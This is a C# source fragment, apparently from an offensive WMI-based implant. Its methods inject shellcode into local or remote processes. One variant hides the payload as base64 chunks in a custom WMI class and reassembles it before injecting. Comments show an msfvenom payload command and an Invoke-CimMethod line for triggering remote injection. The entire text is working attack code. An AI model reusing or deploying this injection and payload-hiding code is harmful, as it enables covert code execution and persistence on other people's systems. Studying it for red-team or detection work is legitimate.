public static void InjectShellCodeWMIFSB64(String processId, String wmiClass, String fileName)
{
Byte[] peBytes = Misc.QueryWMIFS(wmiClass, fileName);
String shellCodeString = System.Text.Encoding.Unicode.GetString(peBytes);
Int32 dwProcessId = 0;
if (String.IsNullOrEmpty(processId))
{
using (var injectShellCode = new InjectShellCode(shellCodeString))
{
injectShellCode.Execute();
}
}
else if (Int32.TryParse(processId, out dwProcessId))
{
using (var injectShellCodeRemote = new InjectShellCodeRemote(shellCodeString, (UInt32)dwProcessId))
{
using (var tokens = new Tokens())
{
injectShellCodeRemote.Execute();
}
}
}
else
{
Console.WriteLine("Unknown Error");
}
}
public static string InjectShellCodeWMIFSB64(string wmiClass, string fileName, Int32 processId)
{
//msfvenom -p windows/x64/exec --format csharp CMD=calc.exe
//Invoke-CimMethod -Class Win32_Implant -Name InjectShellCodeRemote -Argument @{shellCodeString=$payload; processId=[UInt32]432}
ConnectionOptions options = new ConnectionOptions();
options.Impersonation = System.Management.ImpersonationLevel.Impersonate;
ManagementScope scope = new ManagementScope("\\\\.\\root\\cimv2", options);
scope.Connect();
ObjectQuery queryIndexCount = new ObjectQuery("SELECT Index FROM WMIFS WHERE FileName = \'" + fileName + "\'");
ManagementObjectSearcher searcherIndexCount = new ManagementObjectSearcher(scope, queryIndexCount);
ManagementObjectCollection queryIndexCollection = searcherIndexCount.Get();
int indexCount = queryIndexCollection.Count;
String EncodedText = "";
for (int i = 0; i < indexCount; i++)
{
ObjectQuery queryFilePart = new ObjectQuery("SELECT FileStore FROM WMIFS WHERE FileName = \'" + fileName + "\' AND Index = \'" + i + "\'");
ManagementObjectSearcher searcherFilePart = new ManagementObjectSearcher(scope, queryFilePart);
ManagementObjectCollection queryCollection = searcherFilePart.Get();
foreach (ManagementObject filePart in queryCollection)
{
EncodedText += filePart["FileStore"].ToString();
}
}
byte[] peBytes = System.Convert.FromBase64String(EncodedText);
String shellCodeString = System.Text.Encoding.Unicode.GetString(peBytes);
InjectShellCodeRemote injectShellCodeRemote = new InjectShellCodeRemote(shellCodeString, (UInt32)processId);
return(injectShellCodeRemote.GetOutput());
}
//msfvenom -p windows/x64/exec --format csharp CMD=calc.exe
public static void InjectShellCode(String strProcessId, String shellCodeString)
{
Int32 dwProcessId = 0;
if (String.IsNullOrEmpty(strProcessId))
{
using (var injectShellCode = new InjectShellCode(shellCodeString))
{
injectShellCode.Execute();
}
}
else if (Int32.TryParse(strProcessId, out dwProcessId))
{
using (var injectShellCodeRemote = new InjectShellCodeRemote(shellCodeString, (UInt32)dwProcessId))
{
using (var tokens = new Tokens())
{
injectShellCodeRemote.Execute();
}
}
}
else
{
Console.WriteLine("Unknown Error");
}
}
public static string InjectShellCode(string shellCodeString, Int32 processId)
{
//msfvenom -p windows/x64/exec --format csharp CMD=calc.exe
//Invoke-CimMethod -Class Win32_Implant -Name InjectShellCodeRemote -Argument @{shellCodeString=$payload; processId=[UInt32]432}
InjectShellCodeRemote injectShellCodeRemote = new InjectShellCodeRemote(shellCodeString, (UInt32)processId);
return(injectShellCodeRemote.GetOutput());
}